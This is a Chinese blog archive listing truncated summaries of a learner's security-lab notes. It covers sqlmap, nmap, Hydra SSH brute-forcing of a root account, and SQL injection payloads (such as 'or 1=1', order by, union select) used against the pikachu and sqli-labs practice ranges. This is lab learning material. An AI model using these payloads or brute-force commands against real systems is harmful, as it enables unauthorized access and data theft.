2023 年 5月随笔档案 - 我用歌声寻觅你

sqlmap的一些简单使用命令

摘要：post型注入 *每次使用都要重新抓包，不可以使用旧的数据包 1.使用burpsuite对目标站进行抓包 2.打开sqlmap输入指令 sqlmap -r post.txt路径 *直接把post.txt拖进去即可回车(～￣▽￣)～得到数据库名和版本使用 sqlmap.py -r 目标文件 -- 阅读全文

posted @ 2023-05-19 20:16 我用歌声寻觅你阅读(229) 评论(0) 推荐(0) 编辑

waf00f的安装

摘要：一个检测防火墙的工具解压后 win+r cmd 如图操作进入文件夹输入python setup.py install 安装完成后在wafwoof的文件路径处输入cmd 输入python main.py 后接网址即可使用成功画面阅读全文

posted @ 2023-05-19 20:14 我用歌声寻觅你阅读(24) 评论(0) 推荐(0) 编辑

pupstudy的使用

摘要：打开环境点击管理——打开根目录把靶场放在www文件夹里网页打开127.0.0.1/靶场文件名即可阅读全文

posted @ 2023-05-19 20:13 我用歌声寻觅你阅读(28) 评论(0) 推荐(0) 编辑

xshell的使用

摘要：安装后找到文件所在位置打开xhell.exe 然后点击文件新建然后设置名称主机主机设为你要连接电脑的ip地址得到此页面然后输入你要登录的电脑的账户和密码给他创建一个新账户输入 useradd liubei（账户名）之后输入passwd liubei 设置密码然后输入 id li 阅读全文

posted @ 2023-05-18 15:53 我用歌声寻觅你阅读(25) 评论(0) 推荐(0) 编辑

nmap安装

摘要：安装nmap官网https://nmap.org点击download，点击windows点击下载最新版正常安装软件流程，什么都不用管（有两个）点击后面的next，即可完成安装问答为什么要扫描端口查看是否有高危端口开放，比如linux系统开放22端口，就有可能对root账户进行密码爆破阅读全文

posted @ 2023-05-18 15:50 我用歌声寻觅你阅读(74) 评论(0) 推荐(0) 编辑

九头蛇的安装与使用

摘要：安装win+r cmdcd 文件位置hydra.exe使用例hydra.exe -l root -P C:\Users\Administrator\Desktop\zidian.txt 192.168.0.0 sshhydra.exe -L 字典位置 -P 字典位置有具体的就填小写要放字典就填大阅读全文

posted @ 2023-05-18 15:50 我用歌声寻觅你阅读(102) 评论(0) 推荐(0) 编辑

python环境的安装与设置和oneforall的安装与使用

摘要：下载python：https://www.python.org/downloads/windows/安装python如果不需要修改路径，下面两个√打开后，点击上面的install now 也可以可以选择修改安装路径下载OneForALL：在github上边下载安装OneForALL复制你安装OneF 阅读全文

posted @ 2023-05-11 20:55 我用歌声寻觅你阅读(524) 评论(0) 推荐(0) 编辑

手机app抓包个人简述

摘要：1.将在网上下载的手机软件放入apps2.启动3.查看结果urls里是网址阅读全文

posted @ 2023-05-09 09:07 我用歌声寻觅你阅读(8) 评论(0) 推荐(0) 编辑

phpstudy-pikachu-字符型注入（get）

摘要：在查询栏输入1，点击查询获得查询格式?name=1'&submit=查询*捷径 ' or 1=1 --+*非捷径?name=1' and 1=2 --+ 2--+&submit=查询用不了，直接查 ?name=1' order by 2--+&submit=查询?name=1' union sele 阅读全文

posted @ 2023-05-06 11:04 我用歌声寻觅你阅读(27) 评论(0) 推荐(0) 编辑

phpstudy-pikachu-数字型注入（post）

摘要：抓包搞到格式id=1&submit=%E6%9F%A5%E8%AF%A2查字符段id=1 order by 2&submit=%E6%9F%A5%E8%AF%A2id=1 union select 1,2&submit=%E6%9F%A5%E8%AF%A2 阅读全文

posted @ 2023-05-06 11:04 我用歌声寻觅你阅读(27) 评论(0) 推荐(0) 编辑

phpstudy-sqlilabs-less-13

摘要：题目：POST - Double Injection - Single quotes- String - with twist 单引号与括号的双注入先试试 uname=1' or 1=1#&passwd=1&submit=Submit 有报错，但不返回数据库查询的信息了尝试 uname=1'）o 阅读全文

posted @ 2023-05-06 10:09 我用歌声寻觅你阅读(10) 评论(0) 推荐(0) 编辑

phpstudy-sqlilabs-less-14

摘要：题目：POST - Double Injection - Single quotes- String - with twist和上关一模一样uname=1"or 1=1 #&passwd=1&submit=Submit 阅读全文

posted @ 2023-05-06 10:09 我用歌声寻觅你阅读(9) 评论(0) 推荐(0) 编辑

phpstudy-sqlilabs-less-11

摘要：题目：POST - Error Based - Single quotes- String 基于错误的单引号post型字符变形的注入看到有个账密输入口第一反应尝试post注入打开post data在post data 里输入 uname=pppp 'or 1=1#&passwd=1&submit=S 阅读全文

posted @ 2023-05-06 10:08 我用歌声寻觅你阅读(18) 评论(0) 推荐(0) 编辑

phpstudy-sqlilabs-less-1

摘要：题目：POST - Error Based - Double quotes- String - with twist 基于错误的双引号post型字符变形的注入先抓下包，拿到格式 uname=1#&passwd=1&submit=Submit 根据题目注入点可能有 " ) 尝试 uname=1" 阅读全文

posted @ 2023-05-06 10:08 我用歌声寻觅你阅读(9) 评论(0) 推荐(0) 编辑

phpstudy-sqlilabs-less-3

摘要：题目：GET - Error based - Single quotes with twist 基于错误的单引号GET型变形注入 ?id=1 )and 1=2--+ ?id=1 "and 1=2--+ ?id=1 %and 1=2--+ 上面都没反应 ?id=1 'and 1=2--+ 跳出 You 阅读全文

posted @ 2023-05-06 10:00 我用歌声寻觅你阅读(14) 评论(0) 推荐(0) 编辑

phpstudy-sqlilabs-less-4

摘要：题目：GET - Error based - Double Quotes - String 基于错误的GET双引号字符型注入可能的注入点（不全） ' " ) ') ") 观察页面 ?id=1 有正常回显判断注入点 ?id=1' 正常回显，说明注入点不在单引号的闭合上尝试朝前括号 ?id=1) 阅读全文

posted @ 2023-05-06 10:00 我用歌声寻觅你阅读(16) 评论(0) 推荐(0) 编辑

phpstudy-sqlilabs-less-2

摘要：题目：GET - Error based - Intiger based 基于错误的数字型注入?id=1?id=1 order by 3?id=-1 union select 1,2,3?id=-1 union select 1,version(),database()版本：5.7.26名字：sec 阅读全文

posted @ 2023-05-06 09:59 我用歌声寻觅你阅读(7) 评论(0) 推荐(0) 编辑

phpstudy-sqlilabs-less-1

摘要：题目：GET - Error based - Single quotes - String 基于错误的单引号GET型字符注入尝试闭合'?id=1 'and 1=2--+有反应，报错了闭合成功，可以注入开始注入?id=1 'order by 5--+?id=1 'order by 4--+?id=1 阅读全文

posted @ 2023-05-06 09:57 我用歌声寻觅你阅读(7) 评论(0) 推荐(0) 编辑

网络安全学习随笔

仅作为个人学习记录使用

05 2023 档案

公告

搜索

常用链接

随笔分类

随笔档案

阅读排行榜